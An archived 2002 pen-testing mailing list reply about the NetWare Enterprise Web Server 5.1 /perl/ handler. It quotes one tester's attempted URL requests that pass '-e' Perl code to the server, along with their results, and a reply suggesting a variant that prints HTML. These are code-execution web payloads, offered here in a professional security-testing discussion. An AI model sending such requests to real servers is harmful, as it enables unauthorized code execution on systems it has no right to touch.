RE: Re-opening an old thread: NetWare-Enterprise-Web-Server/5.1 --As sistence requested.

From: Bob Mahan (bmahanat_private)
Date: Wed Dec 18 2002 - 15:37:37 PST

Next message: samuelat_private: "Re: TCP/UDP Data Streams - Packet Reassembly"

Previous message: Richard Sharpe: "Re: [tcpdump-workers] TCP/UDP Data Streams - Packet Reassembly"
Next in thread: C-Foo: "Re: Re-opening an old thread: NetWare-Enterprise-Web-Server/5.1 --As sistence requested."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

How about send it some HTML?  Something like:

http://address/perl/-e%20print%20><body>hello%20world</body></html>


You might have to change the tags and/or add a "Content-type: text/html"


Bob Mahan
Network Security Operations 
Phone: (847) 571-5525
mailto:bmahanat_private
http://www.nsoco.com

> -----Original Message-----
> From: Ralph Los [mailto:RLosat_private] 
> Sent: Wednesday, December 18, 2002 2:29 PM
> To: Pen-testat_private
> Subject: Re-opening an old thread: 
> NetWare-Enterprise-Web-Server/5.1 --As sistence requested.
> Sensitivity: Confidential
> 
> 
> Hey - let me re-open a thread again, if you folks don't mind. 
>  I've found a server at one of our pen-test clients with this 
> NetWare HTTP/HTTPS server. I've been trying to figure out a 
> way to make it tango, but have been having some problems.  
> Here's what I've tried and where I left off, maybe someone 
> can toss some suggestions out.
> 
> Attempt:  http://address/perl/-v
> Result: 	NetWare port Copyright 1998 Novell Corporation.
> 		All rights reserved.
> 
> Attempt: http://address/perl/-h
> Result:	Page not found
> 
> Attempt: http://address/perl/-e%20print%20%22hello%20world%22;
> Result: IE just hangs there "DONE"
> 
> Attempt: http://address/perl/-e%20print%201;
> Result: IE just hangs there "DONE"
> 
> So what's up?  Is this box "patched" against this form of 
> attack somehow? Could someone throw me another idea maybe?
> 
> Thanks a bunch.
> 
> 
> --------------------------------------------------------------
> --------------
> This list is provided by the SecurityFocus Security 
> Intelligence Alert (SIA) Service. For more information on 
> SecurityFocus' SIA service which automatically alerts you to 
> the latest security vulnerabilities please see: 
https://alerts.securityfocus.com/





----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: samuelat_private: "Re: TCP/UDP Data Streams - Packet Reassembly"
Previous message: Richard Sharpe: "Re: [tcpdump-workers] TCP/UDP Data Streams - Packet Reassembly"
Next in thread: C-Foo: "Re: Re-opening an old thread: NetWare-Enterprise-Web-Server/5.1 --As sistence requested."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Dec 19 2002 - 19:27:10 PST